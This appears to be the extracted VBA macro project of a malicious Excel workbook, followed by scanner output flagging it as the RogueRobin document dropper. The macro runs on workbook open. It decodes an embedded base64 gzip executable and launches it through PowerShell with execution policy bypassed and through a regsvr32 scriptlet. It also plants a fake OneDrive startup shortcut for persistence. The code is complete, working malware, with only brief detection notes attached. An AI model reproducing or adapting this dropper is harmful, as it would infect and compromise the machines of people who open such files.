str = str + "0GfwTnBf4kWatJgRs8BjERZ78cZmkuuII6NiHnXgF2ELUWCw8jJdlNuOltVMcesztvrtyB9EnuAo6ySJ/qAfDliQ6zjZ0Rp7e1EhR"
str = str + "8DqbVhKd1aMW1whkXs/bGgXyo5CUuzOxbDYISyce0wcpX+Bw+rVIPOk0bC3kYP9ky6yxG1NuY4OoS9F/ej2HElE8uSZQ74kj34Jpu"
str = str + "Zm5KdZ20luh7hPoc+34+nkNpM8zlm2kMEymjZIR/Uz9A+1uvaL62B/N4PqLMpphkdF6Vf4bbDbetMpTnMate1tR8UmQBlogCTDlp+"
str = str + "0sDPL7Rj4PYmSWWic2qFRiItT0CrN0DuQoxl5B0pv4xkatXyEMn65+nm2jBTK5gCXeBU4d1qcupgz2UW7xZew5BUUfQq1pyw7ot6I"
str = str + "dVvEVrEFPZFPD54kMJvx7sYDL9Q6wn1L80hE0dYc2+w8z5Y5nrUkGWlGVFxfLKWZLoJj1khyTj/IObIZC3NXcxcdhkKYzXBP5Ej62"
str = str + "JF0QoQecTvgBDrZAeJO5Dcz1MOYTkC9SBN4bwMd4VJco8uqsQ25ySUTtB0KTENgmnA5PCcgiFTEDKhpUuZY/NNMlcIAFKbX5eqdsZ"
str = str + "wGtZXjYZtEvTwr+XL1XiqluK586G/HpMrCjLNW76JCuk+Jz4FrCpg0G6p0ICUnI5KSloYrzfUyKM/iPcP6m4G53V7Mm0V9UEqlCZ7"
str = str + "W0SX4RJmTF1gmyYXlYQbC3cHjITZfOhaX05vV80Yazc1sEb38LtiLtSzFu5ArWQjZzTYYLo3+Zsugt/Gy3E2f4h0xPFiUmmkBpeVX"
str = str + "cjmOqbwDyyctWHFrWYazT/7Hl1+CZUu3AydbKFuMXbxINqwsD1x2sCxU6FtJqssv4GglKBfdW2Rw4drKrr8LetoMCWZ5FOSIT/Myn"
str = str + "Ck6H3FjXByxjdUoj6xcXK5lxzBpLaxxq0aSl6Z5nj85Xnzj1ojOsPVNsksi96W42DquyrJsUbYOaZVTbLFkFXIJm2EJ0uxOTLYTg6"
str = str + "UV3YW69hpXsKzSXkmyRJFDDmWKq5NadZEfEXUjPPOp7/uY0xnmfFKI3THAcl5GLflneQZKPc2zLClgo2LKksHe6pUY1S6Mo3Dfjtq"
str = str + "Q1N0n6Fc46NmKpxtPLx6MgKMHzxY8p/BM44FzdqTxQA4HFi4HZoMD4Y7jFjxwtX6pv23UjyKM3lRPsXaoR+M8TrO8KJO9nLCsZppL"
str = str + "aImhURPhJLSdZpjqcFC2phyX4zE1uY9iMAGes1ye5HGQzn8TRj4OfdEvzQ3S4QygObwzzClpLeeTQvEeQIAxSoHFFU3sY5OWPdsla"
str = str + "0KPYrDCFrLeNf2s+Wnmmxa32loWFQNWUJLiMEqsW0nCW9i3okbdbaBrKvq5JuS2MUa4mqBJoe+x7LDYRriJNVMmU7XkUqrNdZPTqJ"
str = str + "VH+zQ7N+FX6qRdTPHCPmWFULNsywVPt4nttuAbN/EMT7N/3YS0m4ONtBVsbRJi8a07LZdZiBRzYozZziB+K1TdwVOFVuSNZezHLLP"
str = str + "YYRnEHJvsBLPfaC0bGdDlQHHSmvht3P22osraeGIQVODWxtPdtIyGloEDrECKzET1Tp7UFLfMsAmkaa/U+VJ6kbP1QwQpOt2DZ4zu"
str = str + "7x1ZWv/ytZf2TcaXpYVyzOoRGeVKZWUGsPiGKctDyDCsFBo18ZzJ8Lwhv9DC4ZLJYx21Vr5ueIdxMYDNBc0Fwk5zffKrowiwCyWF9"
str = str + "2FB289Rzu0DzR5A1wFH3q4ZpQPAHwV0BVpXFt/42yPaBE+mabRbEO63SG+n2IPPFUV7+2+PaIfBk6x6jufOAFo6WxTzdb9NYu4tiv"
str = str + "XgymKN/ofE2suL2hzqJJjDXNHdlwtzFNC+gjjdJWnsLVxuKRdB6s4Zy5OJxd95qR0aA9M8D9QBiD3PWyYZyexlxkZx01To9BGbSIN"
str = str + "LRBq1iYSObH2p3GkdipVivpRdetq8F+IxuzoOsESFFVgeRdxuxfil/u3jZWKCpduPXgwyJdVRKsgd2lrt282RQnwJ5+W4FvpNgzsv"
str = str + "lPARNnkZpSRkFFY3avW3EKVlud9YYNYchyQU/ZXcfTFmdRxfoTwDDLiObEXfB/H0oHQIMXAc6VbEURTT90AzvTDEONJ+5Lo4wu9lq"
str = str + "Af4XsbvYkipG+WRkRN1FsvK1YIOGRCrr+uAnk5Ye0naTm/mjfmUFQ1hd9TYwfJN2uQrK29OWlou3ystoYpfunc0eKeVZu5L2zQu3+"
str = str + "b6gu5TvKxKvS/lkYMO51fm0bBczzO8nGJsmpcrLd9551iOpW1cQuPaiwkvHP1CePuF/BXhDWIDxoYOdUfhDCgndErH4MMOFTAO7IU"
str = str + "d4OBAROuYw3MaAcuN4B4H/5uEot8obrZytMMCxpEEFXZODsTHNyqb2ppj+eF3PvnO6vOv2v5j4YwqiscRxc4CgK5TNkSJqiGpWrxv"
str = str + "tbuqakPV3lBIVauu9zhCoVDVoaqox+OpOuaKqnijbsglVBSoGgGANEF0xEYFRgk1hNzCSRiUgAuX1HsIPhQKob4HbRPzqFBdUVG1+"
str = str + "Ha0XbX4uAevhlCDQyOmlR6ngGhoU6mvlbI9DTae+og7GKpKVB2rSqGdUKjB1RCqGvaEvFEVdUP64vucYJkA73rqVj3kaXBJqVxgRm"
str = str + "IKUXUMbRBGo440hIKVitKwVlRXLX5aWSscPkVWqPcD77GwYNtQL+nrSTSPw614vJWK6kHNtcLr1og5ekv/+LiL2Nevcusej1q118O"
str = str + "68NBLRfOKhxQSor4B6XPLYpR1ujeiLyHSEgocBF7vIfkkBWkSIIqrDjUQBBqf4gAvh4cYetCqFvJ43S7QpkNVN7Fyz/Ng1TP8Lbfb"
str = str + "GYA8AaniACmU9BwIuNw0hBA9VOH2cmsNVTOeqhn9lCag+p9AWAEMlKCfCrsrPWpIlUJDNKif2lfrNTdG3eMIuD0QnaX2sLbTUBU0C"
str = str + "gFewMhjODS3o8HlIetxhcgYMBJuRmFE3GrVHA2VqLpLodEPhdxI9btAGQUJmpvzoYcYd/xSWQNlrDJUdBOCU9XjdlaNABeCRF7SIe"
str = str + "wmRQOgwTCVkH6Xl4S6K8ijFfJQR+/T79JRVg/I86e3Hj9c1/PN+zA5OoQi1C7hpH/2QlmthB1aA8zfo2qqQ6saxjOCZwOMBgZMd6n"
str = str + "JTjBEchqoKiaIIode5SkxbM0ZVQWKyBwKDShNk5DDI0Iexfofe62lv/kYUyNHzMTsPiNb/Og/Nm0aZ3IK6OT/z6tCET7bV0kh/86n"
str = str + "RhFVxWst0U88GY12dXRiG3+lIjYkO5Obe7Zs7oh39CY74z0nUpPxxIktifjWzT19E6nNnalEDxxgQBHuzvYO+hVityJWt+8bHiteC"
str = str + "2qzrpPsoL+MgpyhVcUi6+Yf3XaopDrRYkm0B1L/vbxwqFg3EAE8X8D8sAA86+aLikRDAu/q6948NNjVGe8c3NUR7+wc6oj3Dw30xT"
str = str + "s6Bjt6dg1t7u3vGJCUXT0Dw5v7uzviw0O7homyKz7Q190Nys6OnoHuLZsH+3ZJyp7Ovo6eno6O+MBwZy9Rdsf7u3oHLMqh7s0dffT"
str = str + "RB6NRvElml6X78rKMK+IG64um/HDcFi3cGWyLFlTXI7XbFh2cy9DlsR3Z1FzeTGTaogfmJjLp5HWp+THjZCq7Y2Lr1sTm5OYtnX3d"
str = str + "PamO3j6pucL/047MgP6+P/8gHkOIg6NDo+LvGqv6b9o99MZzLQeUjQ++lzQ5uO043YPLHT+TzmTSiZnjQ0ZSfgQ/fjidm0tkoqP5u"
str = str + "cm0QZay+bhlT7njJduyg8bELccPpjKpRC5lQ7fPThb+ou238+cDD5XgLxX+n3/L/HzqIXtufNAwh8+m+IYQD2Mq1T6ZyXDZxWYRve"
str = str + "a/Rtj/535U/jvIKHYstYL/3fzF8nL5N2+9y+DpZwmySD+9Av2H4U0efkyINkeppI2OMLEZHMWWonzDOI73PoRk/MdI4iPOH75Y/L8"
str = str + "U2njutHJOsfQGthBDjDvMYeku6yBshL/FGVy+gWuNWUefOd7oFI/u+Ocp5wP8dzKjfBqU5i+Fl3KaZpqO4m8PNjxwVWI162PQOsIu"
str = str + "nnDxT5OtrLCR2WedkhV+rhZ+0BTaG+LgNclyzJbJOYSao9a26RZrk0Q/HVi4SvUPW7vWUr1OBMcdxYfaqwD9yJItU0mq5dopbp0E/"
str = str + "T8lq1B/D3JTXJN6N4t+mfztc5qluhQXFU/yF9Mu/kBHf2jXwrop8ZEjNMlbVrm9yxV1tItl3m/xS1syF/qcfcmyb2Fdy3L6Qk3l9v"
str = str + "FYScc9rOPyeks1vVTPvVynn7e3Kd4eZ3gb/qvqPfNWIf7eZuQ//NBHt+88O5OJnrbWryaEB03RlHXfdEfTobFd8d6maI5v+GSMbGp"
str = str + "H03wq17Tz6qAv6NuesG7URsEim9vRNGdmt+WS06mZRC4+k06aRs44kY8njZltidxM++nOpuhMIps+kcrlD9vbA7NotMhM3g/Oz5fJ"
str = str + "RL9NUbrIvaNp73z/7GzGusrdnpidbdokOeTNuRzfknyJ8nTJllEzl0rOmWjTygNj3axKTR4w06fTmdRUKvcSuXY3FbnY+cirw5B4T"
str = str + "+p0KhPNULqjKZEbyZ5GQGA2RefS/Xz3bUcT3+W1OsVMNi0jTUH0TWWyb99UVALy2zcVlHq1+M/7WZR/P//d/0ye///n/5qffwfNRy"
str = str + "H6AHoAAA=="";$byteArray = [System.Convert]::FromBase64String($content);$input = New-Object System.IO.M"
str = str + "emoryStream( ,$byteArray );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object Syste"
str = str + "m.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress);$gzipStream.CopyTo"
str = str + "( $output );$gzipStream.Close();$input.Close();[byte[]] $byteOutArray = $output.ToArray();[System.IO."
str = str + "File]::WriteAllBytes(""$env:APPDATA\Microsoft\Windows\Templates\WindowsTemplate.exe"",$byteOutArray);ie"
str = str + "x ""$env:APPDATA\Microsoft\Windows\Templates\WindowsTemplate.exe"";$target = ""$env:APPDATA\Microsoft\Wi"
str = str + "ndows\Templates\WindowsTemplate.exe"";$path = ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Star"
str = str + "tup\OneDrive.lnk"";$wshshell = New-Object -ComObject WScript.Shell;$link = $wshshell.CreateShortcut($p"
str = str + "ath);$link.TargetPath = $target;$link.Save();"
Set Oshell = CreateObject("WScript.Shell")
temp_dir = Oshell.ExpandEnvironmentStrings("%TEMP%")
ps_file_dir = temp_dir + "\WINDOWSTEMP.ps1"
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(ps_file_dir, 2, True)
objFileToWrite.WriteLine (str)
objFileToWrite.Close
Set objFileToWrite = Nothing
Dim powershell_command As String
powershell_command = "powershell.exe -noexit -exec bypass -File " + ps_file_dir
powershell_command = Replace(powershell_command, "\", "\\")
Dim sct_file As String
sct_file = "<?XML version=""1.0""?>" + vbCrLf
sct_file = sct_file + "<scriptlet>" + vbCrLf
sct_file = sct_file + "<registration" + vbCrLf
sct_file = sct_file + "progid = ""PoC""" + vbCrLf
sct_file = sct_file + "classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >" + vbCrLf
sct_file = sct_file + "<script language=""JScript"">" + vbCrLf
sct_file = sct_file + "<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>" + vbCrLf
sct_file = sct_file + "</script>" + vbCrLf
sct_file = sct_file + "</registration>" + vbCrLf
sct_file = sct_file + "</scriptlet>" + vbCrLf
Dim sct_file_path As String
sct_file_path = temp_dir + "\12-B-366.txt"
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(sct_file_path, 2, True)
objFileToWrite.WriteLine (sct_file)
objFileToWrite.Close
Set objFileToWrite = Nothing
'sct_file_path = Replace(sct_file_path, "\", "\\")
Dim final_command As String
final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll"
Call Shell(final_command, vbHide)
End Sub
Private Sub Workbook_Open()
New_Macro
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 62464 bytes |

SHA-256: b6393af0c82176f97c95e1afcf0d1980acc8432945df8bf2352580aadd2e1220

Detection
ClamAV: Doc.Dropper.RogueRobin-6826034-0
Obfuscation or payload: likely. 1442 of 2499 identifiers look randomly generated (e.g. 'Ck6H3FjXByxjdUoj6xcXK5lxzBpLaxxq0aSl6Z5n'); 10 string-concatenation chain(s) — consistent with name-mangling obfuscation.